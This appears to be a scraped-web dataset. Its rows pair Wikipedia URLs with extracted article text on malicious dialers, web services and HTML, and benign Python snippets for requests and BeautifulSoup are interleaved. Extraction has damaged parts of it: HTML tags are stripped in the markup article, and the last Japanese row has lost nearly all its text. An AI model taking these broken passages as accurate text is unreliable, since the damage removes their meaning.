After this change is made, when a user accesses a malicious page or email message, it can start installing the dialer. The script also disables the modem speaker and messages that normally come up while dialing into a network. Users of Microsoft Office Outlook, Outlook Express and Internet Explorer are especially affected if running ActiveX controls and JavaScript is allowed and the latest security patches from Microsoft have not been installed. In March 2004, there were malicious dialers that could be installed through fake anti-virus software citation needed . E-mail spam from a so-called "AntiVirus Team" for example, contained download links to programs named "downloadtool.exe" or "antivirus.exe", which are malicious dialers. Other ways of transmission include electronic greeting cards that link to pages that tricks the user to install ActiveX controls, which in turn install dialers in the background. Therefore, links in spam emails should never be opened, automatically started downloads should be canceled as soon as discovered, and one should check on each dial-up to the Internet to see whether the displayed phone number is unchanged. Another way to protect oneself is to disable premium numbers through one's phone services, but of course this disables all such services. One should never run foreign code in a privileged environment unless the source is trustworthy. It is also advisable to protect oneself with anti-malware programs. On 15 August 2003, a new law came into effect in Germany called "Gesetz zur Bek mpfung des Missbrauchs von (0)190er (0)900er Mehrwertdiensterufnummern" ("Law for the combat of misuse of (0)190 (0)900 value added service numbers"). The law contains the following regulations: On 4 March 2004 the German Federal Supreme Court in Karlsruhe decided that fees for the usage of dialers do not have to be paid if it was used without the user's knowledge. |
419 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=2 | (edit-page URL; the request returned only Wikipedia's IP-block and permission notice, with no article content) |
420 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_service | A web service (WS) is either: In a web service, a web technology such as HTTP is used for transferring machine-readable file formats such as XML and JSON. In practice, a web service commonly provides an object-oriented web-based interface to a database server, utilized for example by another web server, or by a mobile app, that provides a user interface to the end-user. Many organizations that provide data in formatted HTML pages will also provide that data on their server as XML or JSON, often through a Web service to allow syndication. Another application offered to the end-user may be a mashup, where a Web server consumes several Web services at different machines and compiles the content into one user interface. Asynchronous JavaScript And XML (AJAX) is a dominant technology for Web services. Developing from the combination of HTTP servers, JavaScript clients and Plain Old XML (as distinct from SOAP and W3C Web Services), now it is frequently used with JSON as well as, or instead of, XML. Representational State Transfer (REST) is an architecture for well-behaved Web services that can function at Internet scale. In a 2004 document, the W3C sets following REST as a key distinguishing feature of Web services: We can identify two major classes of Web services: There are a number of Web services that use markup languages: A Web API is a development in Web services where emphasis has been moving to simpler representational state transfer (REST) based communications. 2 Restful APIs do not require XML-based Web service protocols (SOAP and WSDL) to support their interfaces. In relation to W3C Web services, the W3C defined a Web service as: A web service is a software system designed to support interoperable machine-to-machine interaction over a network. It has an interface described in a machine-processable format (specifically WSDL). Other systems interact with the web service in a manner prescribed by its description using SOAP-messages, typically conveyed using HTTP with an XML serialization in conjunction with other web-related standards. W3C Web Services may use SOAP over HTTP protocol, allowing less costly (more efficient) interactions over the Internet than via proprietary solutions like EDI B2B. Besides SOAP over HTTP, Web services can also be implemented on other reliable transport mechanisms like FTP. In a 2002 document, the Web Services Architecture Working Group defined a Web services architecture, requiring a standardized implementation of a "Web service. The term "Web service" describes a standardized way of integrating Web-based applications using the XML, SOAP, WSDL and UDDI open standards over an Internet Protocol backbone. XML is the data format used to contain the data and provide metadata around it, SOAP is used to transfer the data, WSDL is used for describing the services available and UDDI lists what services are available. A Web service is a method of communication between two electronic devices over a network. It is a software function provided at a network address over the Web with the service always-on as in the concept of utility computing. Many organizations use multiple software systems for management. citation needed Different software systems often need to exchange data with each other, and a Web service is a method of communication that allows two software systems to exchange this data over the Internet. 
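As a concrete illustration of the REST-plus-JSON style of web service described above, the short sketch below uses the requests library this notebook already loads. The endpoint https://api.example.com/v1/items and its limit parameter are hypothetical placeholders, not a real API, so treat this as a pattern rather than a working call.
import requests

# Minimal sketch of consuming a REST-style web service that returns JSON.
# The endpoint URL below is a placeholder; substitute any real JSON API.
API_URL = "https://api.example.com/v1/items"  # hypothetical endpoint

def fetch_items(params=None):
    """GET a resource and decode the JSON body into Python objects."""
    response = requests.get(API_URL, params=params, timeout=10)
    response.raise_for_status()          # surface HTTP errors (4xx/5xx)
    return response.json()               # parse the JSON payload

if __name__ == "__main__":
    try:
        items = fetch_items({"limit": 5})   # "limit" is an invented query parameter
        print(items)
    except requests.RequestException as e:
        print(f"Request failed: {e}")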
The software system that requests data is called a service requester, whereas the software system that would process the request and provide the data is called a service provider. Different software may use different programming languages, and hence there is a need for a method of data exchange that doesn't depend upon a particular programming language. Most types of software can, however, interpret XML tags. Thus, Web services can use XML files for data exchange. Rules for communication with different systems need to be defined, such as: All of these rules for communication are defined in a file called WSDL (Web Services Description Language), which has a .wsdl extension. (Proposals for Autonomous Web Services (AWS) seek to develop more flexible Web services that do not rely on strict rules.) A directory called UDDI (Universal Description, Discovery, and Integration) defines which software system should be contacted for which type of data. So when one software system needs one particular report or data set, it would go to the UDDI and find out which other systems it can contact for receiving that data. Once the software system finds out which other systems it should contact, it would then contact that system using a special protocol called SOAP (Simple Object Access Protocol). The service provider system would first validate the data request by referring to the WSDL file, and then process the request and send the data under the SOAP protocol. Automated tools can aid in the creation of a Web service. For services using WSDL, it is possible either to automatically generate WSDL for existing classes (a bottom-up model) or to generate a class skeleton given existing WSDL (a top-down model). Critics of non-RESTful Web services often complain that they are too complex 8 and based upon large software vendors or integrators, rather than typical open source implementations. There are also concerns about performance due to Web services' use of XML as a message format and SOAP/HTTP for enveloping and transport. 9 Functional and non-functional testing of Web services is done with the help of WSDL parsing. Regression testing is performed by identifying the changes made to upgrade the software. Web service regression testing needs can be categorized in three different ways, namely, changes in the WSDL, changes in the code, and selective re-testing of operations. We can capture the above three needs in three intermediate forms of Subset WSDL, 7 namely, Difference WSDL (DWSDL), Unit WSDL (UWSDL), and Reduced WSDL (RWSDL), respectively. These three Subset WSDLs are then combined to form Combined WSDL (CWSDL), which is further used for regression testing of the Web service. This helps in Automated Web Service Change Management (AWSCM), 10 by selecting the relevant test cases to construct a reduced test suite from the old test suite. 11 Web services testing can also be automated using several test automation tools like SoapUI, Oracle Application Testing Suite (OATS), 12 13 Unified Functional Testing, Selenium, etc. Work has also been done on the capture and visualization of changes made to a Web service. Visualization and computation of changes can be done in the form of intermediate artifacts (Subset WSDL). 7 The insight into the computation of change impact is helpful in testing, top-down development and reducing regression testing. AWSCM 10 is a tool that can identify subset operations in a WSDL file to construct a subset WSDL.
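To make the WSDL/UDDI/SOAP flow above more tangible, here is a hedged sketch of invoking a SOAP operation by POSTing an XML envelope with requests. The endpoint, namespace, operation name (GetReport) and SOAPAction header value are all invented for illustration; a real service publishes the correct values in its WSDL file.
import requests

# Illustrative sketch of calling a SOAP-based web service by POSTing an XML
# envelope over HTTP. Endpoint, namespace and operation are hypothetical.
SOAP_ENDPOINT = "https://ws.example.com/soap"   # placeholder endpoint
SOAP_ENVELOPE = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetReport xmlns="http://example.com/reports">  <!-- hypothetical operation -->
      <ReportId>42</ReportId>
    </GetReport>
  </soap:Body>
</soap:Envelope>"""

headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "http://example.com/reports/GetReport",  # placeholder action
}

response = requests.post(SOAP_ENDPOINT, data=SOAP_ENVELOPE.encode("utf-8"),
                         headers=headers, timeout=15)
print(response.status_code)
print(response.text[:500])   # the SOAP response is itself an XML document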
While UDDI was intended to serve as a service directory and become the means of discovering web services, many vendors discontinued their UDDI solutions or repositories between 2005 and 2008, including Microsoft, SAP and IBM, among others. 14 15 A key study published at the WWW2008 Conference (Beijing, China) 16 presented the state of SOAP-based web services and concluded that only 63% of the SOAP-based web services available at the time of the study were actually active and could be invoked. The study also found that search engines were becoming a better source for finding web services than service registries like UDDI, owing to UDDI's design complexity. 17 |
421 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/HTML | Hypertext Markup Language (HTML) is the standard markup language for documents designed to be displayed in a web browser. It defines the content and structure of web content. It is often assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for its appearance. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes, and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p and p surround and provide information about document text and may include sub-element tags. Browsers do not display the HTML tags but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behavior and content of web pages. The inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), former maintainer of the HTML and current maintainer of the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 2 A form of HTML, known as HTML5, is used to display video and audio, primarily using the canvas element, together with JavaScript. In 1980, physicist Tim Berners-Lee, a contractor at CERN, proposed and prototyped ENQUIRE, a system for CERN researchers to use and share documents. In 1989, Berners-Lee wrote a memo proposing an Internet-based hypertext system. 3 Berners-Lee specified HTML and wrote the browser and server software in late 1990. That year, Berners-Lee and CERN data systems engineer Robert Cailliau collaborated on a joint request for funding, but the project was not formally adopted by CERN. In his personal notes of 1990, Berners-Lee listed "some of the many areas in which hypertext is used"; an encyclopedia is the first entry. 4 The first publicly available description of HTML was a document called "HTML Tags", 5 first mentioned on the Internet by Tim Berners-Lee in late 1991. 6 7 It describes 18 elements comprising the initial, relatively simple design of HTML. Except for the hyperlink tag, these were strongly influenced by SGMLguid, an in-house Standard Generalized Markup Language (SGML) based documentation format at CERN. Eleven of these elements still exist in HTML 4. 8 HTML is a markup language that web browsers use to interpret and compose text, images, and other material into visible or audible web pages. Default characteristics for every item of HTML markup are defined in the browser, and these characteristics can be altered or enhanced by the web page designer's additional use of CSS. Many of the text elements are mentioned in the 1988 ISO technical report TR 9537 Techniques for using SGML, which describes the features of early text formatting languages such as that used by the RUNOFF command developed in the early 1960s for the CTSS (Compatible Time-Sharing System) operating system. 
These formatting commands were derived from the commands used by typesetters to manually format documents. However, the SGML concept of generalized markup is based on elements (nested annotated ranges with attributes) rather than merely print effects, with separate structure and markup. HTML has been progressively moved in this direction with CSS. Berners-Lee considered HTML to be an application of SGML. It was formally defined as such by the Internet Engineering Task Force (IETF) with the mid 1993 publication of the first proposal for an HTML specification, the "Hypertext Markup Language (HTML) Internet Draft by Berners-Lee and Dan Connolly, which included an SGML Document type definition to define the syntax. 9 10 The draft expired after six months, but was notable for its acknowledgment of the NCSA Mosaic browser's custom tag for embedding in-line images, reflecting the IETF's philosophy of basing standards on successful prototypes. Similarly, Dave Raggett's competing Internet Draft, "HTML (Hypertext Markup Format) , from late 1993, suggested standardizing already-implemented features like tables and fill-out forms. 11 After the HTML and HTML drafts expired in early 1994, the IETF created an HTML Working Group. In 1995, this working group completed "HTML 2.0", the first HTML specification intended to be treated as a standard against which future implementations should be based. 12 Further development under the auspices of the IETF was stalled by competing interests. Since 1996, update the HTML specifications have been maintained, with input from commercial software vendors, by the World Wide Web Consortium (W3C). 13 In 2000, HTML became an international standard (ISO IEC 15445:2000). HTML 4.01 was published in late 1999, with further errata published through 2001. In 2004, development began on HTML5 in the Web Hypertext Application Technology Working Group (WHATWG), which became a joint deliverable with the W3C in 2008, and was completed and standardized on 28 October 2014. 14 XHTML is a separate language that began as a reformulation of HTML 4.01 using XML 1.0. It is now referred to as the XML syntax for HTML and is no longer being developed as a separate standard. 58 On 28 May 2019, the W3C announced that WHATWG would be the sole publisher of the HTML and DOM standards. 65 66 67 68 The W3C and WHATWG had been publishing competing standards since 2012. While the W3C standard was identical to the WHATWG in 2007 the standards have since progressively diverged due to different design decisions. 69 The WHATWG "Living Standard" had been the de facto web standard for some time. 70 HTML markup consists of several key components, including those called tags (and their attributes), character-based data types, character references and entity references. HTML tags most commonly come in pairs like h1 and h1 , although some represent empty elements and so are unpaired, for example img . The first tag in such a pair is the start tag, and the second is the end tag (they are also called opening tags and closing tags). Another important component is the HTML document type declaration, which triggers standards mode rendering. The following is an example of the classic "Hello, World program: The text between html and html describes the web page, and the text between body and body is the visible page content. The markup text title This is a title title defines the browser page title shown on browser tabs and window titles and the tag div defines a division of the page used for easy styling. 
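The "Hello, World" document and the head/body/title/div structure described above can be inspected programmatically with the BeautifulSoup parser this notebook already imports. A minimal sketch follows; the markup is reconstructed for illustration, not taken verbatim from the article.
from bs4 import BeautifulSoup

# A minimal "Hello, World" style HTML document, parsed to show how the
# nested structure described above maps onto a parse tree.
html_doc = """<!DOCTYPE html>
<html>
  <head><title>This is a title</title></head>
  <body>
    <div><p>Hello, World!</p></div>
  </body>
</html>"""

soup = BeautifulSoup(html_doc, "html.parser")
print(soup.title.string)        # -> This is a title
print(soup.body.div.p.string)   # -> Hello, World!
print(soup.p.parent.name)       # -> div (the <p> element's parent)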
Between <head> and </head>, a <meta> element can be used to define webpage metadata. The Document Type Declaration <!DOCTYPE html> is for HTML5. If a declaration is not included, various browsers will revert to "quirks mode" for rendering. 71 HTML documents imply a structure of nested HTML elements. These are indicated in the document by HTML tags, enclosed in angle brackets thus: <p>. 72 In the simple, general case, the extent of an element is indicated by a pair of tags: a "start tag" <p> and "end tag" </p>. The text content of the element, if any, is placed between these tags. Tags may also enclose further tag markup between the start and end, including a mixture of tags and text. This indicates further (nested) elements, as children of the parent element. The start tag may also include the element's attributes within the tag. These indicate other information, such as identifiers for sections within the document, identifiers used to bind style information to the presentation of the document, and for some tags such as the <img> used to embed images, the reference to the image resource in a format like this: <img src="example.com/example.jpg">. Some elements, such as the line break <br>, do not permit any embedded content, either text or further tags. These require only a single empty tag (akin to a start tag) and do not use an end tag. Many tags, particularly the closing end tag for the very commonly used paragraph element <p>, are optional. An HTML browser or other agent can infer the closure for the end of an element from the context and the structural rules defined by the HTML standard. These rules are complex and not widely understood by most HTML authors. The general form of an HTML element is therefore: <tag attribute1="value1" attribute2="value2">content</tag>. Some HTML elements are defined as empty elements and take the form <tag attribute1="value1" attribute2="value2">. Empty elements may enclose no content, for instance, the <br> tag or the inline <img> tag. The name of an HTML element is the name used in the tags. Note that the end tag's name is preceded by a slash character, /, and that in empty elements the end tag is neither required nor allowed. If attributes are not mentioned, default values are used in each case. Header of the HTML document: <head>...</head>. The title is included in the head, for example: HTML headings are defined with the <h1> to <h6> tags, with H1 being the highest (or most important) level and H6 the least: The effects are: CSS can substantially change the rendering. Paragraphs: <p>. Line breaks: <br>. The difference between <br> and <p> is that <br> breaks a line without altering the semantic structure of the page, whereas <p> sections the page into paragraphs. The element <br> is an empty element in that, although it may have attributes, it can take no content and it may not have an end tag. This is a link in HTML. To create a link the <a> tag is used. The href attribute holds the URL address of the link. There are many possible ways a user can give inputs, like: Comments: Comments can help in the understanding of the markup and do not display in the webpage. There are several types of markup elements used in HTML: Most of the attributes of an element are name-value pairs, separated by = and written within the start tag of an element after the element's name. The value may be enclosed in single or double quotes, although values consisting of certain characters can be left unquoted in HTML (but not XHTML). 74 75 Leaving attribute values unquoted is considered unsafe.
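Since this notebook scrapes pages by reading exactly these attributes (href, src, id, class), here is a small sketch of how BeautifulSoup exposes start-tag attributes as dictionary-like entries. The snippet of HTML is invented for illustration.
from bs4 import BeautifulSoup

# Sketch: reading element attributes such as href and src from markup,
# the same operation performed while scraping.
snippet = """
<p id="intro" class="lead">See the <a href="https://example.com/docs">docs</a>.</p>
<img src="https://example.com/example.jpg" alt="example image">
<br>
"""

soup = BeautifulSoup(snippet, "html.parser")

p = soup.find("p")
print(p["id"], p["class"])                 # attributes behave like a dict

for a in soup.find_all("a", href=True):    # every <a> element carrying href
    print(a["href"], a.get_text())

img = soup.find("img")
print(img.get("src"), img.get("alt"))      # .get() returns None if missing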
76 In contrast with name-value pair attributes, there are some attributes that affect the element simply by their presence in the start tag of the element, 6 like the ismap attribute for the img element. 77 There are several common attributes that may appear in many elements: The abbreviation element, abbr, can be used to demonstrate some of these attributes: This example displays as HTML; in most browsers, pointing the cursor at the abbreviation should display the title text "Hypertext Markup Language". Most elements take the language-related attribute dir to specify text direction, such as with "rtl" for right-to-left text in, for example, Arabic, Persian or Hebrew. 78 As of version 4.0, HTML defines a set of 252 character entity references and a set of 1,114,050 numeric character references, both of which allow individual characters to be written via simple markup, rather than literally. A literal character and its markup counterpart are considered equivalent and are rendered identically. The ability to "escape" characters in this way allows for the characters < and & (when written as &lt; and &amp;, respectively) to be interpreted as character data, rather than markup. For example, a literal < normally indicates the start of a tag, and & normally indicates the start of a character entity reference or numeric character reference; writing it as &amp; or &#x26; or &#38; allows & to be included in the content of an element or in the value of an attribute. The double-quote character ("), when not used to quote an attribute value, must also be escaped as &quot; or &#x22; or &#34; when it appears within the attribute value itself. Equivalently, the single-quote character ('), when not used to quote an attribute value, must also be escaped as &#x27; or &#39; (or as &apos; in HTML5 or XHTML documents 79 80 ) when it appears within the attribute value itself. If document authors overlook the need to escape such characters, some browsers can be very forgiving and try to use context to guess their intent. The result is still invalid markup, which makes the document less accessible to other browsers and to other user agents that may try to parse the document for search and indexing purposes, for example. Escaping also allows for characters that are not easily typed, or that are not available in the document's character encoding, to be represented within element and attribute content. For example, the acute-accented e (é), a character typically found only on Western European and South American keyboards, can be written in any HTML document as the entity reference &eacute; or as the numeric references &#xE9; or &#233;, using characters that are available on all keyboards and are supported in all character encodings. Unicode character encodings such as UTF-8 are compatible with all modern browsers and allow direct access to almost all the characters of the world's writing systems. 81 HTML defines several data types for element content, such as script data and stylesheet data, and a plethora of types for attribute values, including IDs, names, URIs, numbers, units of length, languages, media descriptors, colors, character encodings, dates and times, and so on. All of these data types are specializations of character data. HTML documents are required to start with a Document type declaration (informally, a "doctype"). In browsers, the doctype helps to define the rendering mode—particularly whether to use quirks mode.
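Python's standard-library html module applies the same escaping rules for character and entity references; the sketch below round-trips a few of the references mentioned above.
import html

# Character references in practice: convert between literal characters and
# their entity/numeric references, mirroring the escaping rules above.
raw = 'Fish & Chips <b>"é"</b>'

escaped = html.escape(raw, quote=True)
print(escaped)
# -> Fish &amp; Chips &lt;b&gt;&quot;é&quot;&lt;/b&gt;

# unescape() resolves named, decimal and hexadecimal references alike.
print(html.unescape("&eacute; &#233; &#xE9;"))   # -> é é é
print(html.unescape("&lt;p&gt;50%&lt;/p&gt;"))   # -> <p>50%</p>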
The original purpose of the doctype was to enable the parsing and validation of HTML documents by SGML tools based on the Document type definition (DTD). The DTD to which the DOCTYPE refers contains a machine-readable grammar specifying the permitted and prohibited content for a document conforming to such a DTD. Browsers, on the other hand, do not implement HTML as an application of SGML and as consequence do not read the DTD. HTML5 does not define a DTD; therefore, in HTML5 the doctype declaration is simpler and shorter: 82 An example of an HTML 4 doctype This declaration references the DTD for the "strict" version of HTML 4.01. SGML-based validators read the DTD in order to properly parse the document and to perform validation. In modern browsers, a valid doctype activates standards mode as opposed to quirks mode. In addition, HTML 4.01 provides Transitional and Frameset DTDs, as explained below. The transitional type is the most inclusive, incorporating current tags as well as older or "deprecated" tags, with the Strict DTD excluding deprecated tags. The frameset has all tags necessary to make frames on a page along with the tags included in transitional type. 83 Semantic HTML is a way of writing HTML that emphasizes the meaning of the encoded information over its presentation (look). HTML has included semantic markup from its inception, 84 but has also included presentational markup, such as font , i and center tags. There are also the semantically neutral div and span tags. Since the late 1990s, when Cascading Style Sheets were beginning to work in most browsers, web authors have been encouraged to avoid the use of presentational HTML markup with a view to the separation of content and presentation. 85 In a 2001 discussion of the Semantic Web, Tim Berners-Lee and others gave examples of ways in which intelligent software "agents" may one day automatically crawl the web and find, filter, and correlate previously unrelated, published facts for the benefit of human users. 86 Such agents are not commonplace even now, but some of the ideas of Web 2.0, mashups and price comparison websites may be coming close. The main difference between these web application hybrids and Berners-Lee's semantic agents lies in the fact that the current aggregation and hybridization of information is usually designed by web developers, who already know the web locations and the API semantics of the specific data they wish to mash, compare and combine. An important type of web agent that does crawl and read web pages automatically, without prior knowledge of what it might find, is the web crawler or search-engine spider. These software agents are dependent on the semantic clarity of web pages they find as they use various techniques and algorithms to read and index millions of web pages a day and provide web users with search facilities without which the World Wide Web's usefulness would be greatly reduced. In order for search engine spiders to be able to rate the significance of pieces of text they find in HTML documents, and also for those creating mashups and other hybrids as well as for more automated agents as they are developed, the semantic structures that exist in HTML need to be widely and uniformly applied to bring out the meaning of the published text. 87 Presentational markup tags are deprecated in current HTML and XHTML recommendations. 
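If one wants to check from Python which doctype a scraped page declares, BeautifulSoup exposes the declaration as a Doctype node in the parse tree. A minimal sketch, assuming the html.parser backend; the markup is invented.
from bs4 import BeautifulSoup
from bs4.element import Doctype

# Detecting the document type declaration of a parsed page. An HTML5 page
# yields the bare "html" doctype; older documents name the DTD they claim
# to conform to.
html5_doc = "<!DOCTYPE html><html><head><title>t</title></head><body></body></html>"

soup = BeautifulSoup(html5_doc, "html.parser")
doctypes = [node for node in soup.contents if isinstance(node, Doctype)]
print(doctypes[0] if doctypes else "no doctype (browsers would use quirks mode)")
# -> html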
The majority of presentational features from previous versions of HTML are no longer allowed as they lead to poorer accessibility, higher cost of site maintenance, and larger document sizes. 88 Good semantic HTML also improves the accessibility of web documents (see also Web Content Accessibility Guidelines). For example, when a screen reader or audio browser can correctly ascertain the structure of a document, it will not waste the visually impaired user's time by reading out repeated or irrelevant information when it has been marked up correctly. HTML documents can be delivered by the same means as any other computer file. However, they are most often delivered either by HTTP from a web server or by email. The World Wide Web is composed primarily of HTML documents transmitted from web servers to web browsers using the Hypertext Transfer Protocol (HTTP). However, HTTP is used to serve images, sound, and other content, in addition to HTML. To allow the web browser to know how to handle each document it receives, other information is transmitted along with the document. This meta data usually includes the MIME type (e.g., text html or application xhtml xml) and the character encoding (see Character encodings in HTML). In modern browsers, the MIME type that is sent with the HTML document may affect how the document is initially interpreted. A document sent with the XHTML MIME type is expected to be well-formed XML; syntax errors may cause the browser to fail to render it. The same document sent with the HTML MIME type might be displayed successfully since some browsers are more lenient with HTML. The W3C recommendations state that XHTML 1.0 documents that follow guidelines set forth in the recommendation's Appendix C may be labeled with either MIME Type. 89 XHTML 1.1 also states that XHTML 1.1 documents should 90 be labeled with either MIME type. 91 Most graphical email clients allow the use of a subset of HTML (often ill-defined) to provide formatting and semantic markup not available with plain text. This may include typographic information like colored headings, emphasized and quoted text, inline images and diagrams. Many such clients include both a GUI editor for composing HTML e-mail messages and a rendering engine for displaying them. Use of HTML in e-mail is criticized by some because of compatibility issues, because it can help disguise phishing attacks, because of accessibility issues for blind or visually impaired people, because it can confuse spam filters and because the message size is larger than plain text. The most common filename extension for files containing HTML is .html. A common abbreviation of this is .htm, which originated because some early operating systems and file systems, such as DOS and the limitations imposed by FAT data structure, limited file extensions to three letters. 92 An HTML Application (HTA; file extension .hta) is a Microsoft Windows application that uses HTML and Dynamic HTML in a browser to provide the application's graphical interface. A regular HTML file is confined to the security model of the web browser's security, communicating only to web servers and manipulating only web page objects and site cookies. An HTA runs as a fully trusted application and therefore has more privileges, like creation editing removal of files and Windows Registry entries. Because they operate outside the browser's security model, HTAs cannot be executed via HTTP, but must be downloaded (just like an EXE file) and executed from local file system. 
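The MIME type and character encoding that a server advertises for an HTML document can be inspected directly from the Content-Type response header with requests, which this notebook already uses; the Wikipedia URL below is only an example target.
import requests

# Inspecting the MIME type and character encoding advertised by the server.
resp = requests.get("https://en.wikipedia.org/wiki/HTML", timeout=10)

print(resp.headers.get("Content-Type"))   # e.g. "text/html; charset=UTF-8"
print(resp.encoding)                      # encoding inferred from the header
print(resp.apparent_encoding)             # encoding guessed from the body itself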
Since its inception, HTML and its associated protocols gained acceptance relatively quickly. However, no clear standards existed in the early years of the language. Though its creators originally conceived of HTML as a semantic language devoid of presentation details, 93 practical uses pushed many presentational elements and attributes into the language, driven largely by the various browser vendors. The latest standards surrounding HTML reflect efforts to overcome the sometimes chaotic development of the language 94 and to create a rational foundation for building both meaningful and well-presented documents. To return HTML to its role as a semantic language, the W3C has developed style languages such as CSS and XSL to shoulder the burden of presentation. In conjunction, the HTML specification has slowly reined in the presentational elements. There are two axes differentiating various variations of HTML as currently specified: SGML-based HTML versus XML-based HTML (referred to as XHTML) on one axis, and strict versus transitional (loose) versus frameset on the other axis. One difference in the latest when? HTML specifications lies in the distinction between the SGML-based specification and the XML-based specification. The XML-based specification is usually called XHTML to distinguish it clearly from the more traditional definition. However, the root element name continues to be "html" even in the XHTML-specified HTML. The W3C intended XHTML 1.0 to be identical to HTML 4.01 except where limitations of XML over the more complex SGML require workarounds. Because XHTML and HTML are closely related, they are sometimes documented in parallel. In such circumstances, some authors conflate the two names as (X)HTML or X(HTML). Like HTML 4.01, XHTML 1.0 has three sub-specifications: strict, transitional, and frameset. Aside from the different opening declarations for a document, the differences between an HTML 4.01 and XHTML 1.0 document—in each of the corresponding DTDs—are largely syntactic. The underlying syntax of HTML allows many shortcuts that XHTML does not, such as elements with optional opening or closing tags, and even empty elements which must not have an end tag. By contrast, XHTML requires all elements to have an opening tag and a closing tag. XHTML, however, also introduces a new shortcut: an XHTML tag may be opened and closed within the same tag, by including a slash before the end of the tag like this: br . The introduction of this shorthand, which is not used in the SGML declaration for HTML 4.01, may confuse earlier software unfamiliar with this new convention. A fix for this is to include a space before closing the tag, as such: br . 95 To understand the subtle differences between HTML and XHTML, consider the transformation of a valid and well-formed XHTML 1.0 document that adheres to Appendix C (see below) into a valid HTML 4.01 document. Making this translation requires the following steps: Those are the main changes necessary to translate a document from XHTML 1.0 to HTML 4.01. To translate from HTML to XHTML would also require the addition of any omitted opening or closing tags. Whether coding in HTML or XHTML it may just be best to always include the optional tags within an HTML document rather than remembering which tags can be omitted. A well-formed XHTML document adheres to all the syntax requirements of XML. A valid document adheres to the content specification for XHTML, which describes the document structure. 
The W3C recommends several conventions to ensure an easy migration between HTML and XHTML (see HTML Compatibility Guidelines). The following steps can be applied to XHTML 1.0 documents only: By carefully following the W3C's compatibility guidelines, a user agent should be able to interpret the document equally as HTML or XHTML. For documents that are XHTML 1.0 and have been made compatible in this way, the W3C permits them to be served either as HTML (with a text html MIME type), or as XHTML (with an application xhtml xml or application xml MIME type). When delivered as XHTML, browsers should use an XML parser, which adheres strictly to the XML specifications for parsing the document's contents. HTML 4 defined three different versions of the language: Strict, Transitional (once called Loose), and Frameset. The Strict version is intended for new documents and is considered best practice, while the Transitional and Frameset versions were developed to make it easier to transition documents that conformed to older HTML specifications or did not conform to any specification to a version of HTML 4. The Transitional and Frameset versions allow for presentational markup, which is omitted in the Strict version. Instead, cascading style sheets are encouraged to improve the presentation of HTML documents. Because XHTML 1 only defines an XML syntax for the language defined by HTML 4, the same differences apply to XHTML 1 as well. The Transitional version allows the following parts of the vocabulary, which are not included in the Strict version: The Frameset version includes everything in the Transitional version, as well as the frameset element (used instead of body) and the frame element. In addition to the above transitional differences, the frameset specifications (whether XHTML 1.0 or HTML 4.01) specify a different content model, with frameset replacing body, that contains either frame elements, or optionally noframes with a body. As this list demonstrates, the loose versions of the specification are maintained for legacy support. However, contrary to popular misconceptions, the move to XHTML does not imply a removal of this legacy support. Rather the X in XML stands for extensible and the W3C is modularizing the entire specification and opens it up to independent extensions. The primary achievement in the move from XHTML 1.0 to XHTML 1.1 is the modularization of the entire specification. The strict version of HTML is deployed in XHTML 1.1 through a set of modular extensions to the base XHTML 1.1 specification. Likewise, someone looking for the loose (transitional) or frameset specifications will find similar extended XHTML 1.1 support (much of it is contained in the legacy or frame modules). Modularization also allows for separate features to develop on their own timetable. So for example, XHTML 1.1 will allow quicker migration to emerging XML standards such as MathML (a presentational and semantic math language based on XML) and XForms—a new highly advanced web-form technology to replace the existing HTML forms. In summary, the HTML 4 specification primarily reined in all the various HTML implementations into a single clearly written specification based on SGML. XHTML 1.0, ported this specification, as is, to the new XML-defined specification. Next, XHTML 1.1 takes advantage of the extensible nature of XML and modularizes the whole specification. XHTML 2.0 was intended to be the first step in adding new features to the specification in a standards-body-based approach. 
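The strict-versus-lenient parsing difference described above is easy to demonstrate from Python: the standard-library XML parser rejects markup that is not well-formed, while an HTML parser silently repairs it. A small sketch with invented markup:
import xml.etree.ElementTree as ET
from bs4 import BeautifulSoup

# Markup with unclosed tags is rejected by a strict XML parser (the XHTML
# situation) but repaired silently by a lenient HTML parser.
sloppy = "<html><body><p>unclosed paragraph<br></body></html>"

try:
    ET.fromstring(sloppy)
except ET.ParseError as err:
    print("XML parser rejected it:", err)

soup = BeautifulSoup(sloppy, "html.parser")   # lenient, browser-like behaviour
print("HTML parser recovered:", soup.p.get_text())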
The HTML Living Standard, which is developed by WHATWG, is the official version, while W3C HTML5 is no longer separate from WHATWG. There are some WYSIWYG editors (what you see is what you get), in which the user lays out everything as it is to appear in the HTML document using a graphical user interface (GUI), often similar to word processors. The editor renders the document rather than showing the code, so authors do not require extensive knowledge of HTML. The WYSIWYG editing model has been criticized, 96 97 primarily because of the low quality of the generated code; there are voices who? advocating a change to the WYSIWYM model (what you see is what you mean). WYSIWYG editors remain a controversial topic because of their perceived flaws such as: |
422 | https://en.wikipedia.org/wiki/Data_scraping | https://ja.wikipedia.org/wiki/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 | Screen scraping 2 1960 API 50 Telnet 1980 Quotron 24x80 page shredding Logicizer VAX VMS logicized 1 OCR GUI Web HTML XHTML Web Web API HTML PDF API |
